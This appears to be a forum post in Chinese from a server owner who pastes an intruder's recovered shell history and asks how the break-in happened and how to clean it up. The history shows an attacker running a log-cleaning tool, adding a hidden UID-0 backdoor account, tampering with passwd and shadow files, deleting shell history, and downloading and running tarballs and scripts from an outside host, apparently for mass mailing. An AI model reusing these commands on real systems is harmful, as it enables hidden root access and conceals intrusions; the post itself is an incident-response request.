|
今早发现服务器起不来了,使用恢复盘启动后发现命令历史中有下面这些东西,请高手指点到底是怎么被黑的,用的是什么工具,以及如何清除?
cd /usr/share/.a
./mig -u root -n 0
useradd -o -u 0 -g 0 -d /var/log/lib lib
passwd lib
vi /etc/passwd
mv /etc/passwd /etc/passwd-
cp /etc/passwd- /etc/passwd
vi /etc/shadow
mv /etc/shadow /etc/shadow-
cp /etc/shadow- /etc/shadow
w
ls -al
cd /root
rm -rf .bash_history
exit
bash
cd /usr/share/.a
ls -al
rm -rf spp6/
wget www.geocities.com/adasadaa/sp1.tgz
ftp ftp.geocities.com
tar zxvf sp1.tgz
rm -rf sp1.tgz
cd sp1/
ls -al
cat list.txt
php mib.php
cd ..
rm -rf sp1/
ftp ftp.geocities.com
tar zxvf sp1.tgz
cd sp1
php mib.php
service sendmail restart
service sendmail start
ls-al
ls -al
cd ..
rm -rf sp1
ftp ftp.geocities.com
tar zxvf ps1.tgz
rm -rf ps1.tgz
cd s
cd sp
cd sp1
ls -al
php mib.php
ls -al
rm -rf list.txt
cat >> list.txt
vi list.txt
php mib.php
ps -ax
ps -ax
mail
mail ssolicss@yahoo.com
ps -ax
ps -ax
ps -ax
ps -ax
cd ..
wget www.geocities.com/adasadaa/ps2.tgz; tar zxvf ps2.tgz; rm -rf ps2.tgz; cd sp2; rm -rf list.txt
ftp ftp.geocities.com
ls -al
rm -rf ps1* sp1*
tar zxvf sp2.tgz
mv 2.txt sp2/
cd sp2/
ls -al
ls -al
rm -rf list.txt
mv 2.txt list.txt
perl perl.pl &
ls -la |
|